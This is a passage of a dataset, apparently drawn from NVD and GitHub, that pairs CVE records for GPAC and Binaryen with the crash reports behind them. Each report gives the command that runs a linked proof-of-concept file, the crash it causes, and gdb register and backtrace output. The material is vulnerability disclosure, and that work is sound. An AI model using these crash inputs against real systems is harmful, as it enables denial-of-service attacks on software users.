/home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #14 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #15 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #16 0x00007ffff7c0ef20 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #17 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #18 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #19 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so (More stack frames follow...) gdb-peda$ ```
A stack-overflow in printf_common()
https://api.github.com/repos/WebAssembly/binaryen/issues/4391/comments
4
2021-12-14T12:41:56Z
2025-05-16T18:34:13Z
https://github.com/WebAssembly/binaryen/issues/4391
1,079,711,435
4,391
2,963
CVE-2021-46051
2022-01-10T14:11:19.437
A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the Media_IsSelfContained function, which could cause a Denial of Service. .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2011" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2011" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2011
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC11 ``` [POC11.zip](https://github.com/gpac/gpac/files/7772906/POC11.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x5569555dfdc4 RBX: 0x1 RCX: 0x5555555e18c0 --> 0x3712 RDX: 0x4015 RSI: 0x1 RDI: 0x5555555e2840 --> 0x146d646975 RBP: 0x5555555e2840 --> 0x146d646975 RSP: 0x7fffffff7f70 --> 0x5555555e0e14 --> 0x4017 RIP: 0x7ffff79286ca (<Media_IsSelfContained+26>: mov rax,QWORD PTR [rax+0x30]) R8 : 0x5555555e18c0 --> 0x3712 R9 : 0x7fffffff7f00 --> 0x2 R10: 0x7ffff76d927a ("gf_isom_box_size") R11: 0x7ffff76a0be0 --> 0x5555555e8770 --> 0x5555555e18d4 --> 0x640204c700000000 R12: 0x14 R13: 0x5555555e05c0 --> 0x73747363 ('csts') R14: 0x5555555e8740 --> 0x636f3648 ('H6oc') R15: 0x1 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff79286c3 <Media_IsSelfContained+19>: push rbx 0x7ffff79286c4 <Media_IsSelfContained+20>: mov rax,QWORD PTR [rdi+0x40] 0x7ffff79286c8 <Media_IsSelfContained+24>: mov ebx,esi => 0x7ffff79286ca <Media_IsSelfContained+26>: mov rax,QWORD PTR [rax+0x30] 0x7ffff79286ce <Media_IsSelfContained+30>: mov r12,QWORD PTR [rax+0x48] 0x7ffff79286d2 <Media_IsSelfContained+34>: test esi,esi 0x7ffff79286d4 <Media_IsSelfContained+36>: je 0x7ffff7928780 <Media_IsSelfContained+208> 0x7ffff79286da <Media_IsSelfContained+42>: test r12,r12 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7f70 --> 0x5555555e0e14 --> 0x4017 0008| 0x7fffffff7f78 --> 0x5555555e8740 --> 0x636f3648 ('H6oc') 0016| 0x7fffffff7f80 --> 0x14 0024| 0x7fffffff7f88 --> 0x7ffff790ffcb (<shift_chunk_offsets.part.0+75>: test eax,eax) 0032| 0x7fffffff7f90 --> 0x5555555e2840 --> 0x146d646975 0040| 0x7fffffff7f98 --> 0x5555555e05c0 --> 0x73747363 ('csts') 0048| 0x7fffffff7fa0 --> 0x0 0056| 0x7fffffff7fa8 --> 0x7fffffff7ff0 --> 0x5555555e8740 --> 0x636f3648 ('H6oc') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff79286ca in Media_IsSelfContained () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff79286ca in Media_IsSelfContained () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff790ffcb in shift_chunk_offsets.part () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff79103a7 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7910e3c in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7915009 in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #7 0x000055555557bd12 in mp4boxMain () #8 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe388, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe378) at ../csu/libc-start.c:308 #9 0x000055555556d45e in _start () ```
Untrusted pointer dereference in Media_IsSelfContained ()
https://api.github.com/repos/gpac/gpac/issues/2011/comments
1
2021-12-24T06:14:20Z
2022-01-03T11:25:05Z
https://github.com/gpac/gpac/issues/2011
1,088,176,668
2,011
2,964
CVE-2021-46052
2022-01-10T14:11:20.443
A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::Tuple::validate.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:104:*:*:*:*:*:*:*", "matchCriteriaId": "C9EB2419-1D93-4BAA-83D1-1F6174CAB74E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/WebAssembly/binaryen/issues/4411
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_104 ``` **command:** ``` wasm-as POC6 ``` [POC6.zip](https://github.com/WebAssembly/binaryen/files/7775594/POC6.zip) **Result** ``` Aborted. ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff4416040 (0x00007ffff4416040) RCX: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffb0d0 --> 0x0 RDI: 0x2 RBP: 0x7ffff45d5588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffffb0d0 --> 0x0 RIP: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffb0d0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff799e2e0 ("/home/zxq/CVE_testing/project/binaryen/src/wasm-type.h") R13: 0x1c6 R14: 0x7ffff79a2ce0 ("type.isSingle()") R15: 0x60300000e090 --> 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff446017f <__GI_raise+191>: mov edi,0x2 0x7ffff4460184 <__GI_raise+196>: mov eax,0xe 0x7ffff4460189 <__GI_raise+201>: syscall => 0x7ffff446018b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff4460193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff446019c <__GI_raise+220>: jne 0x7ffff44601c4 <__GI_raise+260> 0x7ffff446019e <__GI_raise+222>: mov eax,r8d 0x7ffff44601a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffb0d0 --> 0x0 0008| 0x7fffffffb0d8 --> 0x49cbd0 (<free>: push rbp) 0016| 0x7fffffffb0e0 --> 0xfbad8000 --> 0x0 0024| 0x7fffffffb0e8 --> 0x6120000001c0 --> 0x3a73612d24800005 0032| 0x7fffffffb0f0 --> 0x612000000225 ("sertion `type.isSingle()' failed.\n") 0040| 0x7fffffffb0f8 --> 0x6120000001c0 --> 0x3a73612d24800005 0048| 0x7fffffffb100 --> 0x6120000001c0 --> 0x3a73612d24800005 0056| 0x7fffffffb108 --> 0x612000000247 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff443f859 in __GI_abort () at abort.c:79 #2 0x00007ffff443f729 in __assert_fail_base (fmt=0x7ffff45d5588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff79a2ce0 <str> "type.isSingle()", file=0x7ffff799e2e0 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-type.h", line=0x1c6, function=<optimized out>) at assert.c:92 #3 0x00007ffff4450f36 in __GI___assert_fail (assertion=0x7ffff79a2ce0 <str> "type.isSingle()", file=0x7ffff799e2e0 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-type.h", line=0x1c6, function=0x7ffff79a2d20 <__PRETTY_FUNCTION__._ZN4wasm5Tuple8validateEv> "void wasm::Tuple::validate()") at assert.c:101 #4 0x00007ffff520ff7c in wasm::Tuple::validate (this=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm-type.h:454 #5 0x00007ffff7087705 in wasm::Tuple::Tuple (this=0x7fffffffb660, types=std::vector of length 3, capacity 3 = {...}) at /home/zxq/CVE_testing/project/binaryen/src/wasm-type.h:437 #6 wasm::SExpressionWasmBuilder::parseTypeUse (this=<optimized out>, s=..., startPos=<optimized out>, functionType=..., namedParams=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:637 #7 0x00007ffff70890bc in wasm::SExpressionWasmBuilder::parseTypeUse (this=0x7fffffffda40, s=..., startPos=0x4, functionType=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:679 #8 0x00007ffff705de99 in wasm::SExpressionWasmBuilder::parseImport (this=<optimized out>, s=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:3191 #9 0x00007ffff705adb3 in wasm::SExpressionWasmBuilder::preParseImports (this=<optimized out>, curr=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:406 #10 0x00007ffff7056441 in wasm::SExpressionWasmBuilder::SExpressionWasmBuilder (this=<optimized out>, wasm=..., module=..., profile=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:380 #11 0x00000000004d2a80 in main (argc=<optimized out>, argv=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/tools/wasm-as.cpp:113 #12 0x00007ffff44410b3 in __libc_start_main (main=0x4cef20 <main(int, char const**)>, argc=0x2, argv=0x7fffffffe268, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe258) at ../csu/libc-start.c:308 #13 0x000000000042478e in _start () at /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/iostream:7 ```
A abort failure in wasm::Tuple::validate ()
https://api.github.com/repos/WebAssembly/binaryen/issues/4411/comments
4
2021-12-25T07:43:44Z
2025-01-09T17:16:36Z
https://github.com/WebAssembly/binaryen/issues/4411
1,088,563,297
4,411
2,965
CVE-2021-46053
2022-01-10T14:11:21.647
A Denial of Service vulnerability exists in Binaryen 103. The program terminates with signal SIGKILL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4392" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4392" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:103:*:*:*:*:*:*:*", "matchCriteriaId": "851AA3FC-CFB5-4A99-A10C-830974545702", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/WebAssembly/binaryen/issues/4392
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_103 ``` **System information** **command:** ``` ./bin/wasm-ctor-eval POC5 ``` [POC5.zip](https://github.com/WebAssembly/binaryen/files/7711740/POC5.zip) **Result** ``` Program terminated with signal SIGKILL, Killed. ```
Program terminated with signal SIGKILL, Killed.
https://api.github.com/repos/WebAssembly/binaryen/issues/4392/comments
3
2021-12-14T12:53:22Z
2025-01-09T18:18:53Z
https://github.com/WebAssembly/binaryen/issues/4392
1,079,722,066
4,392
2,966
CVE-2021-46054
2022-01-10T14:11:22.437
A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4410" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4410" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:104:*:*:*:*:*:*:*", "matchCriteriaId": "C9EB2419-1D93-4BAA-83D1-1F6174CAB74E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/WebAssembly/binaryen/issues/4410
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_104 ``` **command:** ``` ./bin/wasm-ctor-eval POC5 ``` [POC5.zip](https://github.com/WebAssembly/binaryen/files/7775566/POC5.zip) **Result** ``` 76703 abort ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff6d47fc0 (0x00007ffff6d47fc0) RCX: 0x7ffff6ee118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffcbe0 --> 0x0 RDI: 0x2 RBP: 0x7ffff7056588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffffcbe0 --> 0x0 RIP: 0x7ffff6ee118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffcbe0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff7e4e3d8 ("/home/zxq/CVE_testing/source/binaryen/src/wasm/wasm-binary.cpp") R13: 0x1964 R14: 0x7ffff7e4f588 ("curr->target != DELEGATE_CALLER_TARGET") R15: 0x5555555f7030 --> 0x30246c6562616c ('label$0') EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6ee117f <__GI_raise+191>: mov edi,0x2 0x7ffff6ee1184 <__GI_raise+196>: mov eax,0xe 0x7ffff6ee1189 <__GI_raise+201>: syscall => 0x7ffff6ee118b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff6ee1193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff6ee119c <__GI_raise+220>: jne 0x7ffff6ee11c4 <__GI_raise+260> 0x7ffff6ee119e <__GI_raise+222>: mov eax,r8d 0x7ffff6ee11a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffcbe0 --> 0x0 0008| 0x7fffffffcbe8 --> 0x7ffff6f38850 (<__GI___libc_free>: endbr64) 0016| 0x7fffffffcbf0 --> 0x7ffffbad8000 0024| 0x7fffffffcbf8 --> 0x5555555e7920 --> 0x0 0032| 0x7fffffffcc00 --> 0x5555555e7985 ("inaryBuilder::visitRethrow(wasm::Rethrow*): Assertion `curr->target != DELEGATE_CALLER_TARGET' failed.\n") 0040| 0x7fffffffcc08 --> 0x5555555e7920 --> 0x0 0048| 0x7fffffffcc10 --> 0x5555555e7920 --> 0x0 0056| 0x7fffffffcc18 --> 0x5555555e79ec --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff6ec0859 in __GI_abort () at abort.c:79 #2 0x00007ffff6ec0729 in __assert_fail_base (fmt=0x7ffff7056588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff7e4f588 "curr->target != DELEGATE_CALLER_TARGET", file=0x7ffff7e4e3d8 "/home/zxq/CVE_testing/source/binaryen/src/wasm/wasm-binary.cpp", line=0x1964, function=<optimized out>) at assert.c:92 #3 0x00007ffff6ed1f36 in __GI___assert_fail (assertion=0x7ffff7e4f588 "curr->target != DELEGATE_CALLER_TARGET", file=0x7ffff7e4e3d8 "/home/zxq/CVE_testing/source/binaryen/src/wasm/wasm-binary.cpp", line=0x1964, function=0x7ffff7e4f548 "void wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*)") at assert.c:101 #4 0x00007ffff7c09ca1 in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #5 0x00007ffff7c0b48c in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #6 0x00007ffff7c0c17e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #7 0x00007ffff7c0ff90 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #8 0x00007ffff7c109bb in wasm::WasmBinaryBuilder::readFunctions() () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #9 0x00007ffff7c11f52 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #10 0x00007ffff7c3dec6 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #11 0x00007ffff7c3e6cc in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #12 0x00007ffff7c3eda1 in wasm::ModuleReader::read(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #13 0x000055555556943e in main () #14 0x00007ffff6ec20b3 in __libc_start_main (main=0x5555555688c0 <main>, argc=0x2, argv=0x7fffffffe338, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe328) at ../csu/libc-start.c:308 #15 0x0000555555569e5e in _start () ```
A abort failure in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*)
https://api.github.com/repos/WebAssembly/binaryen/issues/4410/comments
9
2021-12-25T07:10:11Z
2024-07-25T18:07:07Z
https://github.com/WebAssembly/binaryen/issues/4410
1,088,559,821
4,410
2,967
CVE-2021-46055
2022-01-10T14:11:22.887
A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4413" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4413" } ]
